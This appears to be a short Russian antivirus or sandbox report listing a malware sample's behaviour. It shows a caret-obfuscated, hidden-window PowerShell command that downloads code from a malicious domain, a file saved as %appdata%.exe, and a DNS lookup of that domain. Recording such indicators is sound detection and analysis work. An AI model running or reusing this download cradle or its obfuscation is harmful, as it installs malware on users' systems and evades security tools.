Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^wers^H^ElL.^ExE^ -EX^eCUt^IoNpolIcY ^bYPass -n^opr^o^f^ILE -^Win^d^O^wsT^yl^e Hid^DEN^ (nEW-oBje^c^t^ SYsTe^m.N^Et.wEbCli^e^N^T).D^OWNL^o^A^d^fIL^E('http://vvorootad.top/read....
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "P^o^wers^H^ElL.^ExE^ -EX^eCUt^IoNpolIcY ^bYPass -n^opr^o^f^ILE -^Win^d^O^wsT^yl^e Hid^DEN^ (nEW-oBje^c^t^ SYsTe^m.N^Et.wEbCli^e^N^T).D^OWNL^o^A^d^fIL^E('http://vvorootad.top/read....' (со скрытым окном)